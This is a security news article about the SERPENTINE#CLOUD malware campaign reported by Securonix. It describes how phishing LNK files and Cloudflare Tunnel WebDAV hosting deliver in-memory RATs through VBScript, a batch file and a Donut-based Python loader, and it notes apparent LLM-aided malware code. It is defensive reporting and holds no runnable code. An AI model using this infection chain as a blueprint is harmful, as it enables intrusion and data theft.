SERPENTINE#CLOUD: Stealthy Malware Campaign Leverages Cloudflare Tunnels for In-Memory RAT Delivery

A newly uncovered malicious campaign, dubbed SERPENTINE#CLOUD, leverages Cloudflare Tunnel subdomains to deliver payloads via phishing email attachments. This intricate, multi-stage infection chain was identified by Securonix, which observed activity across multiple regions—including the United States, the United Kingdom, Germany, and various other countries throughout Europe and Asia.

The initial phase of the attack begins with a widespread phishing email campaign featuring subject lines related to invoices or payments. These messages contain ZIP file attachments embedding a Windows shortcut (LNK) disguised as a PDF document. Upon opening, the file triggers a download of a script from a remote WebDAV server hosted on a Cloudflare Tunnel subdomain. This tactic allows the attackers to exploit the trusted infrastructure of a widely-used cloud service as a covert transport layer, evading traditional domain-based detection mechanisms.

The next stage involves the execution of a Windows Script File (WSF) via cscript.exe. Written in VBScript, the script fetches an external batch file—kiki.bat—also hosted on a Cloudflare subdomain. To distract the victim, it opens a fake PDF document while simultaneously checking for antivirus software and retrieving the next-stage payload: Python-based scripts.

The final stage employs a Python-based loader that injects malicious code into memory using Donut, a well-known open-source in-memory shellcode loader. Identified payloads include remote access tools (RATs) such as AsyncRAT, Revenge RAT, GuLoader, Remcos, PureLogs Stealer, XWorm, and Venom RAT. These operate exclusively in memory, leaving no artifacts on the file system, which greatly hinders detection.

Researchers emphasized the evolving nature of initial access vectors. Whereas attackers previously relied on internet shortcut files (URL), they have now shifted toward using standard Windows shortcut files (LNK) masquerading as documents. These trigger WebDAV-based downloads through subdomains like .trycloudflare[.]com, making the malicious traffic virtually indistinguishable from legitimate communication.

Moreover, analysts discovered extensive comments embedded within the batch and VBScript code, hinting at the potential involvement of language models—suggesting code generation aided by large language models (LLMs). Collectively, these attributes render the campaign highly evasive, multilayered, and meticulously obfuscated.

A cornerstone of SERPENTINE#CLOUD’s effectiveness lies in its fusion of social engineering, living-off-the-land (LotL) techniques leveraging native Windows utilities, and stealthy in-memory execution. By harnessing Cloudflare Tunnel, the attackers ensure not only encrypted delivery channels but also a complete replacement of conventional command-and-control architecture, significantly reducing the chance of detection or disruption by cybersecurity professionals.

Securonix warns that this campaign is ongoing and likely to evolve, potentially targeting new regions and scenarios. Although the threat actors exhibit fluency in English, their precise origin remains undetermined.

Related Posts:

• Subdomain Takeovers: A Growing Supply Chain Threat
• DNS Tunneling: The Hidden Threat Exploited by Cyberattackers
• New Tunneling Protocol Vulnerabilities Expose 4.2 Million Hosts to Cyberattacks
• AsyncRAT Rises Again: Malware Abuses Legitimate Services for Stealthy Delivery
• Cloudflare Pulls the Plug on HTTP: API Now HTTPS-Only